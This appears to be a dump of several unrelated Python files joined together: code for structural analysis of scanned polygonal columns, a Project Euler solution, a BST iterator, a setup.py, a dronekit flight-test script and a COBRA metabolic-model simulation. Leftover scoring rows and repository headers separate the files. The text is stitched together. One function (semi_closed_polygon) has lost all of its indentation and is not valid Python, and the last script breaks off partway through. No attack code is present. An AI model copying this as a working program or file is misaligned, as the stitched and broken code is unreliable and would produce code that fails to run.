
    def add_all_sides(self, n_sides, prefix, fit_planes=False, offset_to_midline=False):
        """
        Add multiple sides.

        Multiple FlatFace instances are created as sides of the polygonal column. A series of files containing scanned
        data points must be given. The files should be on the same path and have a filename structure as:
        `path/basenameXX.pkl`, where XX is an id number in ascending order starting from 01.
        Only the `path/basename` is given as input to this method.

        Parameters
        ----------
        n_sides : int
            Number of sides of the polygonal cross-section to look for in the directory
        prefix : str
            Path and file name prefix for the pickle files containing the scanned data points.
        fit_planes :
            Perform least square fitting on the imported data to calculate the reference planes.
        offset_to_midline :
            Offset the data points and the fitted plane by half the thickness to be on the midline of the cross-section.
        """
        # Replace any previously loaded sides.
        self.sides = []
        for x in range(1, n_sides + 1):
            print('Adding scanned data, facet: {}'.format(x))
            self.sides.append(s3d.FlatFace.from_pickle(prefix + '{:02d}.pkl'.format(x)))

        if fit_planes:
            for i, x in enumerate(self.sides):
                print('Fitting a reference plane, facet: {}'.format(i + 1))
                x.fit_plane()

        if offset_to_midline:
            # Move from the scanned (outer) surface to the section midline.
            offset = self.thickness / 2
            for i, x in enumerate(self.sides):
                print('Offsetting plane and points, facet: {}'.format(i + 1))
                x.offset_face(offset, offset_points=True)

    def add_single_edge_from_pickle(self, filename):
        """
        Create a RoundEdge instance as one edges af the polygon column.

        The RoundEdge instance is created from a pickle file of scanned data points.

        :param filename:
        :return:
        """
        self.edges.append(s3d.RoundedEdge.from_pickle(filename))

    def add_all_edges(self, n_sides, prefix, intrsct_lines=False):
        """
        Add multiple edges.

        Multiple RoundEdge instances are created as edges of the polygonal column. A series of files containing scanned
        data points must be given. The files should be on the same path and have a filename structure as:
        `path/basenameXX.pkl`, where XX is an id number in ascending order starting from 01.
        Only the `path/filename` is given as input to this method.
        After adding the sequential edges, if intrsct_lines=True, the reference lines are calculated as the
        intersections of sequential sides.

        Parameters
        ----------
        n_sides : int
            Number of edges to be added (number of cross-sections sides).
        prefix : str
            Path and prefix of naming (read description for the expected naming scheme)
        intrsct_lines : bool
            Assign intersection lines to the edges from the intersection of adjacent facets.
        """
        # Replace any previously loaded edges.
        self.edges = []
        for x in range(1, n_sides + 1):
            print('Adding scanned data, edge: {}'.format(x))
            self.edges.append(s3d.RoundedEdge.from_pickle(prefix + '{:02d}.pkl'.format(x)))

        if intrsct_lines:
            # Negative indices so that `x + 1` wraps to 0 for the last edge,
            # closing the polygon.
            for x in range(-len(self.sides), 0):
                print('Adding theoretical edge, edge: {}'.format(x + n_sides + 1))
                self.edges[x].theoretical_edge = (self.sides[x].ref_plane & self.sides[x + 1].ref_plane)

    def find_real_edges(self, offset_to_midline=False, ref_lines=False):
        """
        Find edge points on the scanned rounded edge.

        A series of points is returned which represent the real edge of the polygonal column. Each point is calculated
        as the intersection of a circle and a line at different heights of the column, where the circle is best fit to
        the rounded edge scanned points and the line passing through the reference edge (see `add_all_edges`
        documentation) and the polygon's centre line.

        Parameters
        ----------
        offset_to_midline : bool
            Offset the calculated points to the midline of the section based on the thickness property of the object.
        ref_lines : bool
            Assign reference lines to the edges by best fitting on the real edge points.
        """
        if offset_to_midline:
            # Negative: the midline lies inwards of the scanned outer surface.
            offset = -self.thickness / 2
        else:
            offset = 0

        if isinstance(self.centre_line, ag.Line3D) and isinstance(self.edges, list):
            for i, x in enumerate(self.edges):
                print('Fitting circles and calculating edge points, edge: {}'.format(i + 1))
                # axis=2: circles fitted in planes normal to the z (length) axis.
                x.fit_circles(axis=2, offset=offset)
                x.calc_edge_points(self.centre_line)
        else:
            print('Wrong type inputs. Check if the real_specimen object has a centre line assigned to it and if it has'
                  'a list of edge lines.')
            return NotImplemented

        if ref_lines:
            for i, x in enumerate(self.edges):
                print('Calculating reference line by fitting on the edge points, edge: {}'.format(i + 1))
                x.calc_ref_line()

    def find_edge_imperfection_displacements(self):
        """Calculate distances of edge points to each reference line."""
        for i, x in enumerate(self.edges):
            print('Calculating initial imperfection displacements, edge: {}.'.format(i + 1))
            if x.ref_line:
                if x.ref_line is NotImplemented:
                    # Fitting may have failed upstream; mark this edge as such.
                    print('The reference line is type `NotImplemented`, fitting possibly did not converge.')
                    x.edge2ref_dist = NotImplemented
                else:
                    x.calc_edge2ref_dist()
            else:
                print('No reference line. Edge imperfection not calculated.')
                x.edge2ref_dist = NotImplemented

    def find_facet_imperfection_displacements(self):
        """Calculate distances of facet points to each reference plane."""
        for i, x in enumerate(self.sides):
            print('Calculating initial imperfection displacements, facet: {}'.format(i + 1))
            x.calc_face2ref_dist()

    def plot_all(self):
        """
        Plot all data.

        Plots every facet's scanned points (heavily decimated) and each edge's
        line on a single 3D figure.

        :return:
        """
        max_z = max([x.scanned_data[:, 2].max() for x in self.sides])
        min_z = min([x.scanned_data[:, 2].min() for x in self.sides])
        fig1 = plt.figure()
        Axes3D(fig1)
        for i in range(-len(self.sides), 0):
            self.sides[i].plot_face(reduced=0.001, fig=fig1)

        # NOTE(review): `facet_intrsct_line` is not set anywhere in this class;
        # `add_all_edges` assigns `theoretical_edge` instead — this looks like a
        # stale attribute name, TODO confirm against the s3d.RoundedEdge API.
        for i in range(-len(self.edges), 0):
            self.edges[i].facet_intrsct_line.plot_line(fig=fig1, ends=[min_z, max_z])

    def print_report(self):
        """
        Print a report for the polygon column.

        Reports the maximum initial imperfection displacement for every facet
        (distance to reference plane) and every edge (distance to reference
        line), when available.
        """
        for i, x in enumerate(self.sides):
            if x.face2ref_dist is NotImplemented:
                print('No initial displacement data, facet: {}'.format(i + 1))
            else:
                print('Max init displacement from ref plane, facet: {}'.format(i + 1), max(np.abs(x.face2ref_dist)))

        for i, x in enumerate(self.edges):
            if x.edge2ref_dist is NotImplemented:
                print('No initial displacement data, edge: {}'.format(i + 1))
            else:
                print('Max init displacement from ref line, edge: {}'.format(i + 1),
                      max(np.abs(x.edge2ref_dist)))

        # TODO: Fix the following code and add more to the report.
        # (references `facet_intrsct_line`, see NOTE in `plot_all`)
        # max_z = max([x.scanned_data[:, 2].max() for x in self.sides])
        # min_z = min([x.scanned_data[:, 2].min() for x in self.sides])
        # for i in range(len(self.sides)):
        #     print('Side {} is : {}'.format(i + 1, self.sides[i].ref_plane.plane_coeff))
        #     print('')
        #     print('Edge {} (sides {}-{})\n    Direction : {}\n    Through points : \n{}\n{}'.format(
        #         i + 1,
        #         i + 1,
        #         i + 2,
        #         self.edges[i].facet_intrsct_line.parallel,
        #         self.edges[i].facet_intrsct_line.xy_for_z(min_z),
        #         self.edges[i].facet_intrsct_line.xy_for_z(max_z))
        #     )
        #     print('')
class TestData(lt.Experiment):
    """
    Measurements from a compression test on one specimen.

    Extends ``lt.Experiment`` with the specimen length and cross-section area
    needed to convert raw channels (Load, Stroke, strain gauges) into average
    stress, average strain and clear axial displacement.
    """

    def __init__(self, header, channel_header, data, name, specimen_length=None, cs_area=None):
        # Clear length; used to convert average strain to displacement.
        self.specimen_length = specimen_length
        # Theoretical cross-section area; used to convert load to stress.
        self.cs_area = cs_area
        super().__init__(header, channel_header, data, name)

    def process_data(self):
        """
        Run the standard post-processing chain on the raw channels.

        :return:
        """
        self.calc_avg_strain()
        self.calc_disp_from_strain()
        self.calc_avg_stress()

    def add_eccentricity(self, axis, column, moi, min_dist, thickness, young):
        """
        Calculate eccentricity.

        Adds a column in the data dictionary for the eccentricity of the load application on a given axis based on
        two opposite strain measurements.
        """
        self.data['e_' + axis] = []
        # Load is recorded in kN and strains in microstrain; convert to N and
        # plain strain before evaluating the eccentricity.
        for load, strain1, strain2 in zip(self.data['Load'], self.data[column[0]], self.data[column[1]]):
            self.data['e_' + axis].append(self.eccentricity_from_strain(
                load * 1000,
                [strain1 * 1e-6, strain2 * 1e-6],
                moi,
                min_dist + thickness / 2,
                young)
            )

    def offset_stroke(self, offset=None):
        """
        Offset stroke values.

        Parameters
        ----------
        offset : float, optional
            Distance to offset. By default, the initial displacement (first value) is used, effectively displacing
            the values to start from 0.
        """
        if offset is None:
            offset = self.data['Stroke'][0]

        self.data['Stroke'] = self.data['Stroke'] - offset

    def calc_disp_from_strain(self):
        """Calculate the specimen clear axial deformation based on measured strains"""
        self.add_new_channel_zeros('disp_clear')
        self.data['disp_clear'] = self.data['avg_strain'] * self.specimen_length

    def calc_avg_strain(self):
        """Calculate the average strain from all strain gauges."""
        # Create new data channel.
        self.add_new_channel_zeros('avg_strain')
        i = 0

        # Collect all strain gauge records: channels named with two digits
        # followed by 'F' or 'C' (e.g. '01F').
        # BUGFIX: the original condition `a and (k is 'F') or (k is 'C')`
        # grouped as `(a and b) or c`, so any key with 'C' in the third
        # position matched regardless of the digit prefix; it also compared
        # strings with `is` (identity) instead of equality.
        for key in self.data.keys():
            if len(key) > 2 and key[:2].isdigit() and key[2] in ('F', 'C'):
                self.data['avg_strain'] = self.data['avg_strain'] + self.data[key]
                i += 1

        # Gauges record microstrain; divide by 1e6 to obtain strain.
        self.data['avg_strain'] = self.data['avg_strain'] / (i * 1e6)

    def calc_avg_stress(self):
        """Calculate the average stress based on the measured reaction force on the load cell and the
        theoretical area."""
        # Create new data channel.
        self.add_new_channel_zeros('avg_stress')
        # Load is in kN; multiply by 1e3 so the result is in MPa for area in mm^2.
        self.data['avg_stress'] = self.data['Load'] * 1e3 / self.cs_area

    def plot_stroke_load(self, ax=None):
        """Load vs stroke curve plotter"""
        if ax is None:
            # Create a fresh figure/axes and decorate it fully.
            fig = plt.figure()
            plt.plot()
            ax = fig.axes[0]
            self.plot2d('Stroke', 'Load', ax=ax)
            ax.invert_xaxis()
            ax.invert_yaxis()
            handles, labels = ax.get_legend_handles_labels()
            ax.legend(handles[::-1], labels[::-1])
            ax.set_xlabel('Displacement, u [mm]')
            ax.set_ylabel('Reaction, N [kN]')
            ax.grid()
            return ax
        elif not isinstance(ax, plt.Axes):
            # BUGFIX: `type(plt.axes())` instantiated a throwaway axes (and
            # figure) just to obtain the Axes type; `plt.Axes` is the class.
            print('Unexpected input type. Input argument `ax` must be of type `matplotlib.pyplot.axes()`')
            return NotImplemented
        else:
            # Plot onto the axes supplied by the caller.
            self.plot2d('Stroke', 'Load', ax=ax)
            return ax

    def plot_strain_stress(self, ax=None):
        """Plot average strain vs average stress."""
        if ax is None:
            fig = plt.figure()
            plt.plot()
            ax = fig.axes[0]
            self.plot2d('avg_strain', 'avg_stress', ax=ax)
            ax.invert_xaxis()
            ax.invert_yaxis()
            handles, labels = ax.get_legend_handles_labels()
            ax.legend(handles, labels)
            ax.set_xlabel('Strain, ε')
            ax.set_ylabel('Stress, σ [Mpa]')
            ax.grid()
            return ax
        elif not isinstance(ax, plt.Axes):
            print('Unexpected input type. Input argument `ax` must be of type `matplotlib.pyplot.axes()`')
            return NotImplemented
        else:
            self.plot2d('avg_strain', 'avg_stress', ax=ax)
            handles, labels = ax.get_legend_handles_labels()
            ax.legend(handles, labels)
            return ax

    def plot_disp_load(self, ax=None):
        """Plot load vs real displacement."""
        if ax is None:
            fig = plt.figure()
            plt.plot()
            ax = fig.axes[0]
            self.plot2d('disp_clear', 'Load', ax=ax)
            ax.invert_xaxis()
            ax.invert_yaxis()
            handles, labels = ax.get_legend_handles_labels()
            ax.legend(handles[::-1], labels[::-1])
            ax.set_xlabel('Displacement, u [mm]')
            ax.set_ylabel('Reaction, N [kN]')
            ax.grid()
            return ax
        elif not isinstance(ax, plt.Axes):
            print('Unexpected input type. Input argument `ax` must be of type `matplotlib.pyplot.axes()`')
            return NotImplemented
        else:
            self.plot2d('disp_clear', 'Load', ax=ax)
            handles, labels = ax.get_legend_handles_labels()
            ax.legend(handles[::-1], labels[::-1])
            return ax

    @staticmethod
    def eccentricity_from_strain(load, strain, moi, dist, young=None):
        """
        Load eccentricity based on strain pairs.

        Calculate the eccentricity of an axial load to the neutral axis of a specimen for which pairs of strains are
        monitored with strain gauges. The eccentricity is calculated on one axis and requires the moment of inertia
        around it and a pair of strains on tow positions symmetric to the neutral axis. Elastic behaviour is assumed.
        """
        # Default values.
        if young is None:
            young = 210000.
        else:
            young = float(young)

        # Eccentricity: e = (eps1 - eps2) * E * I / (2 * N * d).
        ecc = (strain[0] - strain[1]) * young * moi / (2 * load * dist)

        # Return
        return ecc
def semi_closed_polygon(n_sides, radius, t, tg, rbend, nbend, l_lip):
"""
Polygon sector nodes.
Calculates the node coordinates for a cross-section of the shape of
a lipped polygon sector.
Parameters
----------
n_sides : int
Number of sides of original polygon.
radius : float
Radius of the original polygon.
t : float
Thickness of the profile
tg : float
Thickness of the profile
rbend : float
Radius of the bended corners' arc
nbend : int
Number of nodes along the corners' arcs
l_lip : int
Length of the lips
Returns
-------
list of lists
Returns points for the entire profile (1st and 2nd returned values), and points for a single sector (3rd and 4th
returned values).
"""
# Angle corresponding to one face of the polygon
theta = 2 * np.pi / n_sides
# Angles of radii (measured from x-axis)
phi = np.linspace(5 * np.pi / 6, np.pi / 6, int(n_sides / 3 + 1))
# xy coords of the polygon's corners
x = radius * np.cos(phi)
y = radius * np.sin(phi)
# Bends
# Distance between bending centre and corner
lc = rbend / np.cos(theta / 2)
# Centers of bending arcs
xc = x[1:-1] - lc * np.cos(phi[1:-1])
yc = y[1:-1] - lc * np.sin(phi[1:-1])
# Angles of the edges' midlines (measured from x-axis)
phi_mids = phi[0:-1] - theta / 2
# xy coords of the arc's points
xarc = [[0 for j in range(nbend + 1)] for i in range(int(n_sides / 3 - 1))]
yarc = [[0 for j in range(nbend + 1)] for i in range(int(n_sides / 3 - 1))]
for i in range(int(n_sides / 3 - 1)):
for j in range(nbend + 1):
xarc[i][j] = xc[i] + rbend * np.cos(phi_mids[i] - j * (theta / nbend))
yarc[i][j] = yc[i] + rbend * np.sin(phi_mids[i] - j * (theta / nbend))
# Start-end extensions
# Bending radius
rs = rbend / 2
xcs = [0, 0]
ycs = [0, 0]
# First bend
v1 = phi_mids[0] - np.pi / 2
v2 = (phi[0] + phi_mids[0] - np.pi / 2) / 2
l1 = (t + tg) / (2 * np.cos(phi[0] - phi_mids[0]))
l2 = rs / np.sin(v2 - phi_mids[0] + np.pi / 2)
x1 = x[0] + l1 * np.cos(v1)
y1 = y[0] + l1 * np.sin(v1)
# First bend centre coords
xcs[0] = x1 + l2 * np.cos(v2)
ycs[0] = y1 + l2 * np.sin(v2)
# Last bend
v1 = phi_mids[-1] + np.pi / 2
v2 = (v1 + phi[-1]) / 2
l1 = (t + tg) / (2 * np.cos(v1 - phi[-1] - np.pi / 2))
l2 = rs / np.sin(v2 - phi[-1])
x1 = x[-1] + l1 * np.cos(v1)
y1 = y[-1] + l1 * np.sin(v1)
# Last bend centre coords
xcs[1] = x1 + l2 * np.cos(v2)
ycs[1] = y1 + l2 * np.sin(v2)
# First and last bend arc points coords
xsarc = [[0 for j in range(nbend + 1)] for j in [0, 1]]
ysarc = [[0 for j in range(nbend + 1)] for j in [0, 1]]
for j in range(nbend + 1):
xsarc[0][j] = xcs[0] + rs * np.cos(4 * np.pi / 3 + j * ((phi_mids[0] - np.pi / 3) / nbend))
ysarc[0][j] = ycs[0] + rs * np.sin(4 * np.pi / 3 + j * ((phi_mids[0] - np.pi / 3) / nbend))
xsarc[1][j] = xcs[1] + rs * np.cos(
phi_mids[-1] + np.pi + j * ((phi[-1] + np.pi / 2 - phi_mids[-1]) / nbend))
ysarc[1][j] = ycs[1] + rs * np.sin(
phi_mids[-1] + np.pi + j * ((phi[-1] + np.pi / 2 - phi_mids[-1]) / nbend))
# Points of the lips
# Lip length according to bolt washer diameter
# First lip
xstart = [xsarc[0][0] + l_lip * np.cos(phi[0]), xsarc[0][0] + l_lip * np.cos(phi[0]) / 2]
ystart = [ysarc[0][0] + l_lip * np.sin(phi[0]), ysarc[0][0] + l_lip * np.sin(phi[0]) / 2]
# Last point
xend = [xsarc[1][-1] + l_lip * np.cos(phi[-1]) / 2, xsarc[1][-1] + l_lip * np.cos(phi[-1])]
yend = [ysarc[1][-1] + l_lip * np.sin(phi[-1]) / 2, ysarc[1][-1] + l_lip * np.sin(phi[-1])]
# Collect the x, y values in a sorted 2xn array
xarcs, yarcs = [], []
for i in range(len(phi) - 2):
xarcs = xarcs + xarc[i][:]
yarcs = yarcs + yarc[i][:]
x_sector = xstart + xsarc[0][:] + xarcs[:] + xsarc[1][:] + xend
y_sector = ystart + ysarc[0][:] + yarcs[:] + ysarc[1][:] + yend
# Copy-rotate the points of the first sector to create the entire CS
# Rotation matrix
rot_matrix = np.array([[np.cos(-2 * np.pi / 3), -np.sin(-2 * np.pi / 3)],
[np.sin(-2 * np.pi / 3), np.cos(-2 * np.pi / 3)]])
# Dot multiply matrices
coord1 = np.array([x_sector, y_sector])
coord2 = rot_matrix.dot(coord1)
coord3 = rot_matrix.dot(coord2)
# Concatenate into a single xy array
x_cs = np.concatenate([coord1[0], coord2[0], coord3[0]])
y_cs = np.concatenate([coord1[1], coord2[1], coord3[1]])
# Return matrices
return [x_cs, y_cs, x_sector, y_sector]
def main(
        add_real_specimens=True,
        add_experimental_data=True,
        make_plots=True,
        export=False,
        print_reports=True
):
    """Build, post-process and optionally plot/report/export the nine polygonal specimens."""
    # `export=True` selects the default pickle path; a string selects a custom one.
    if export is True:
        export = './data/polygonal.pkl'

    # Common properties of all nine specimens.
    length = 700.
    f_yield = 700.
    fab_class = 'fcA'

    print('Creating the polygonal column objects.')
    cases = [PolygonalColumn(name='specimen{}'.format(i + 1)) for i in range(9)]

    print('Adding theoretical specimens with calculations to the polygonal columns')
    # (n_sides, thickness, plate classification) per specimen, in order.
    theoretical_params = [
        (16, 3., 30.), (16, 3., 40.), (16, 3., 50.),
        (20, 3., 30.), (20, 3., 40.), (20, 2., 50.),
        (24, 3., 30.), (24, 2., 40.), (24, 2., 50.),
    ]
    for case, (n_sides, thickness, p_class) in zip(cases, theoretical_params):
        case.add_theoretical_specimen(n_sides, length, f_yield, fab_class,
                                      thickness=thickness, p_class=p_class)

    print('Adding real specimens with the 3d scanned data to the polygonal columns.')
    if add_real_specimens:
        for i, case in enumerate(cases):
            print('Adding real scanned shape to specimen number {}'.format(i + 1))
            case.add_real_specimen('data/sp{}/'.format(i + 1))

    print('Adding experimental data from the compression tests.')
    if add_experimental_data:
        for i, case in enumerate(cases):
            print('Adding experimental data to specimen number {}'.format(i + 1))
            case.add_experiment('data/sp{}/experiment/sp{}.asc'.format(i + 1, i + 1))

        # Correction of stroke tare value on some measurements.
        for i in (1, 3, 4):
            cases[i].experiment_data.offset_stroke()

    if make_plots:
        print('Producing plots.')
        # Strain-stress curves: one figure per group of three specimens.
        for first in (0, 3, 6):
            ax = cases[first].experiment_data.plot_strain_stress()
            cases[first + 1].experiment_data.plot_strain_stress(ax=ax)
            cases[first + 2].experiment_data.plot_strain_stress(ax=ax)
        # Displacement-load

    if print_reports:
        for case in cases:
            print('')
            case.report_real_specimen()

    if export:
        print('Exporting the generated object with all the processed specimens to pickle.')
        with open(export, 'wb') as fh:
            pickle.dump(cases, fh)

    return cases
| 2.625 | 3 |
problems/21.py | christofferaakre/project-euler | 0 | 12772892 | <gh_stars>0
#!/usr/bin/env python3
from main import Solver, list_divisors
solver = Solver()
def are_amicable(x: int, y: int) -> bool:
    """Return True when x and y form an amicable pair.

    Two distinct numbers are amicable when the sum of the proper divisors
    of each one equals the other; `x != y` excludes perfect numbers.
    """
    sum_x = sum(list_divisors(x, proper=True))
    sum_y = sum(list_divisors(y, proper=True))
    # Return the condition directly instead of the verbose
    # `if ...: return True / else: return False` pattern.
    return x != y and sum_x == y and sum_y == x
# Sum of all amicable numbers below 10000 (Project Euler 21).
# For each candidate the proper-divisor sum is computed once and its partner
# checked directly: O(n) divisor-sum evaluations instead of the original
# O(n^2) pairwise scan (~5e7 calls). For this range every amicable partner is
# itself below 10000, so the result is unchanged.
S = 0
for x in range(2, 10000):
    partner = sum(list_divisors(x, proper=True))
    # `partner > 1` guards list_divisors() against 0/1; `partner != x`
    # excludes perfect numbers.
    if partner > 1 and partner != x and sum(list_divisors(partner, proper=True)) == x:
        S += x

solver.solve(21, S)
| 3.34375 | 3 |
data_structure/binary_search_tree/173. Binary Search Tree Iterator_medium.py | JunzhongLin/leetcode_practice | 0 | 12772893 | '''
Implement the BSTIterator class that represents an iterator over the in-order traversal of a binary search tree (BST):
BSTIterator(TreeNode root) Initializes an object of the BSTIterator class. The root of the BST is given as part of the constructor. The pointer should be initialized to a non-existent number smaller than any element in the BST.
boolean hasNext() Returns true if there exists a number in the traversal to the right of the pointer, otherwise returns false.
int next() Moves the pointer to the right, then returns the number at the pointer.
Notice that by initializing the pointer to a non-existent smallest number, the first call to next() will return the smallest element in the BST.
You may assume that next() calls will always be valid. That is, there will be at least a next number in the in-order traversal when next() is called.
'''
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class BSTIterator(object):
    """In-order iterator over a binary search tree.

    Keeps only the path of not-yet-visited ancestors on a stack (O(h) memory,
    h = tree height), instead of the original scheme that interleaved `None`
    markers with nodes. This also fixes `hasNext()` reporting True for an
    empty tree: the original hard-coded the initial size to 1 and tracked it
    separately from the stack, so the two could disagree.
    """

    def __init__(self, root):
        """
        :type root: TreeNode
        """
        self.stack = []
        self._push_left(root)

    def _push_left(self, node):
        """Push `node` and its chain of left children onto the stack."""
        while node:
            self.stack.append(node)
            node = node.left

    def next(self):
        """Return the next value in in-order sequence.

        :rtype: int
        """
        if not self.stack:
            # Preserve the original behaviour of returning None when the
            # traversal is exhausted (callers are guaranteed valid calls).
            return None
        node = self.stack.pop()
        # The node's left subtree is done; descend into the right subtree.
        self._push_left(node.right)
        return node.val

    def hasNext(self):
        """Return True while un-visited nodes remain.

        :rtype: bool
        """
        return len(self.stack) > 0
# Your BSTIterator object will be instantiated and called as such:
# obj = BSTIterator(root)
# param_1 = obj.next()
# param_2 = obj.hasNext() | 4.15625 | 4 |
2457.py | heltonricardo/URI | 6 | 12772894 | c = input().strip()
# Words of the phrase, read from the second input line.
fr = input().split()
# Count the words that contain the target string `c` (read above).
n = sum(1 for word in fr if c in word)
# Print the percentage of matching words with one decimal place.
print('{:.1f}'.format(n * 100 / len(fr)))
| 3.15625 | 3 |
setup.py | atkirtland/pyffe | 8 | 12772895 | from setuptools import setup
# Packaging metadata for the `pyffe` PyCaffe helper library.
setup(name='pyffe',
      version='0.1',
      description='Tools and utils for PyCaffe',
      # url='http://github.com/fabiocarrara/pyffe',
      author='<NAME>',
      author_email='<EMAIL>',
      license='MIT',
      packages=['pyffe', 'pyffe.models'],
      zip_safe=False,
      # NOTE(review): `requires` is purely informational metadata and is not
      # enforced by pip; runtime dependencies would need `install_requires`.
      requires=['functools32', 'tqdm', 'pandas', 'lmdb', 'caffe']
      )
| 1.0625 | 1 |
dronecode/pruebas_vuelo.py | tomasjm/dronekit-ufro | 3 | 12772896 | """
dronekit-sitl copter --home=-38.7460967,-72.6154299,0,180
mavproxy.py --master tcp:127.0.0.1:5760 --out udp:127.0.0.1:14550 --out udp:127.0.0.1:14551
mission planner en puerto udp:14550
dronekit en puerto udp:14551
https://github.com/ArduPilot/MAVProxy/issues/543
"""
# from pymavlink import mavutil
"""
------------------------------
IMPORTS E INICIALIZACION
------------------------------
"""
from dronekit import connect, VehicleMode
from time import sleep
from vuelo import despegarVehiculo, moverAlPunto, aterrizarVehiculo, goto
from utils import agregarDistanciaMetros
import argparse
# Command-line setup: the connection string defaults to a UDP endpoint
# (see the header notes for the SITL / mavproxy port wiring).
parser = argparse.ArgumentParser()
parser.add_argument('--connect', default='udp:192.168.8.120:14551')
args = parser.parse_args()
print('Conectando al vehiculo en: %s' % args.connect)
# wait_ready=True blocks until the autopilot has reported its initial state.
vehicle = connect(args.connect, baud=57600, wait_ready=True)
"""
------------------------------
CODIGO PRINCIPAL
------------------------------
"""
def prueba_default():
    """First flight test: take off to 3 m, hover 8 s, land and close the
    module-level ``vehicle`` connection."""
    print("------COMENZANDO LA PRIMERA PRUEBA ------")
    despegarVehiculo(vehicle, 3)
    sleep(8)  # hover before landing
    aterrizarVehiculo(vehicle)
    sleep(1)
    vehicle.close()
def prueba_movimiento():
    """Second flight test: take off to 5 m, fly two identical relative legs,
    then land.

    The (2.5, 2.5) arguments are presumably metre offsets passed through to
    ``vuelo.goto`` -- TODO confirm their axis convention there.
    """
    print("------COMENZANDO LA SEGUNDA PRUEBA ------")
    despegarVehiculo(vehicle, 5)
    goto(vehicle, 2.5, 2.5)
    sleep(3)
    goto(vehicle, 2.5, 2.5)
    sleep(3)
    aterrizarVehiculo(vehicle)
    sleep(1)
    vehicle.close()
def prueba_final():
    """Third flight test: take off to 30 m and fly a closed loop of relative
    offsets before landing.

    NOTE(review): the offsets appear to trace a polygon around the start
    point; the exact meaning of each (a, b) pair depends on ``vuelo.goto``
    -- confirm there before reusing.
    """
    print("------COMENZANDO LA TERCERA PRUEBA ------")
    despegarVehiculo(vehicle, 30)
    goto(vehicle, 5, 0)
    sleep(1)
    goto(vehicle, -1.5, 3.5)
    sleep(1)
    goto(vehicle, -3.5, 1.5)
    sleep(1)
    goto(vehicle, -3.5, -1.5)
    sleep(1)
    goto(vehicle, -1.5, -3.5)
    sleep(1)
    goto(vehicle, 1.5, -3.5)
    sleep(1)
    goto(vehicle, 3.5, -1.5)
    sleep(1)
    goto(vehicle, 3.5, 1.5)
    sleep(1)
    goto(vehicle, 1.5, 3.5)
    sleep(1)
    goto(vehicle, -5, 0)
    sleep(1)
    aterrizarVehiculo(vehicle)
    vehicle.close()
# Entry point: only the second test is executed when this script runs.
prueba_movimiento()
| 2.578125 | 3 |
ComplementaryScripts/Step_03_Compare_Refine/Step_simulate_case02.py | HaoLuoChalmers/Lactobacillus_reuteri_MM41A_GEM | 0 | 12772897 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by <NAME> at 2019-09-02
"""Step_simulate.py
:description : script
:param :
:returns:
:rtype:
"""
import os
import cobra
import matplotlib.pyplot as plt
import numpy as np
os.chdir('../../ComplementaryData/Step_03_Compare_Refine/')
print('----- loading model -----')
iHL622 = cobra.io.load_json_model('../../ModelFiles/iHL622.json')
# %% <biomass vs od >
print('----- change medium -----')
iHL622.objective = "BIOMASS"
# Five experimental conditions (A-E) with measured OD600 and errors.
experiment_group = ['A', 'B', 'C', 'D', 'E']
experiment_result = [1.38, 1.88, 1.92, 1.92, 1.90]
experiment_result_err = [0.66, 0.35, 0.69, 0.37, 0.47]
# Exchange-reaction bounds per condition; the sign convention matches the
# loop below: values <= 0 become lower bounds (uptake), values > 0 become
# upper bounds (secretion caps).
experiment_medium = {
    'EX_glc__D_e': [-20, -20, -20, -20, -20, ],
    'EX_glyc_e': [0.00, -5.00, -5.00, -10.00, -10.],
    'EX_fru_e': [0.00, -1.00, -5.00, -1.00, -5.],
    'EX_lac__L_e': [18.215, 21.334, 20.882, 17.881, 16.577],
    'EX_ac_e': [17.058, 18.301, 18.285, 19.703, 19.643],
    'EX_etoh_e': [5.135, 4.623, 4.312, 2.558, 2.230],
}
# for k in experiment_medium.keys():  # g/L --> mM
#     temp = np.array(experiment_medium[k])*1000/iHL622.metabolites.get_by_id(k.replace('EX_','')).formula_weight
#     experiment_medium[k] = temp
# Simulate each condition on a fresh copy of the model: apply the medium
# bounds for that column, optimize for biomass and record the growth rate.
predict_result = []
for idx in range(len(experiment_result)):
    candidate = iHL622.copy()
    for rxn_id, per_condition in experiment_medium.items():
        flux = per_condition[idx]
        reaction = candidate.reactions.get_by_id(rxn_id)
        if flux <= 0:
            reaction.bounds = (flux, 0)
        else:
            reaction.bounds = (0, flux)
    solution = candidate.optimize()
    predict_result.append(round(solution.objective_value, 3))
print('Experiment Biomass:', experiment_result)
print('iHL622 Biomass:', predict_result)
# %% <vitmin B12 > NOTE: error
# experiment_medium = {
# 'BIOMASS': predict_result,
# 'EX_glc__D_e': [-20, -20, -20, -20, -20, ],
# 'EX_glyc_e': [0.00, -5.00, -5.00, -10.00, -10.],
# 'EX_fru_e': [0.00, -1.00, -5.00, -1.00, -5.], }
#
# predict_result_b12 = []
# for i in range(0, len(experiment_result)):
# model = iHL622.copy()
# rea = cobra.Reaction('EX_adeadocbl_c')
# model.add_reaction(rea)
# model.reactions.get_by_id('EX_adeadocbl_c').reaction = 'adeadocbl_c --> '
# model.objective = 'EX_adeadocbl_c'
# # model.reactions.get_by_id('EX_ade_e').bounds = (0,0)
# for rea in experiment_medium.keys():
# bound = experiment_medium[rea][i]
# if rea == 'BIOMASS':
# model.reactions.get_by_id(rea).bounds = (bound, bound)
#
# elif bound <= 0:
# model.reactions.get_by_id(rea).bounds = (bound, 0)
# elif bound >= 0:
# model.reactions.get_by_id(rea).bounds = (0, bound)
# predict_result_b12.append(
# round(model.optimize().objective_value * 1355.365, 3)) # Cobalamin: Molar mass: 1,355.365 g/mol
# print('iHL622 b12:', predict_result_b12)
# %% <draw>
import brewer2mpl
fig, ax = plt.subplots(figsize=(6, 4))
ax2 = ax.twinx()
bmap = brewer2mpl.get_map('Set2', 'qualitative', 7)
colors = bmap.mpl_colors
# plt.ylim((0.0, 1.0))
x = np.arange(0, 5)
width = 0.25 # the width of the bars
rects2 = ax.bar(x + width / 2, predict_result, width, label='Model Growth rate', color=colors[0]) # ,
rects1 = ax2.bar(x - width / 2, experiment_result, width, yerr=experiment_result_err, label='Experiment OD600',
color=colors[1]) #
rects1_ = ax2.bar(0, 0, label='Model Growth rate', color=colors[0], )
# Add some text for labels, title and custom x-axis tick labels, etc.
ax2.set_ylabel("OD600", fontsize=16)
ax.set_ylabel('Growth rate (mmol/gDW/h)', fontsize=16) # color = 'tab:blue'
# ax.tick_params(axis='y') # , labelcolor='tab:blue'
ax2.set_ylim((0, 3.2))
ax.set_ylim((0, 2.2))
ax.set_title('Growth rate simulation', fontsize=18)
labels = [''] + experiment_group
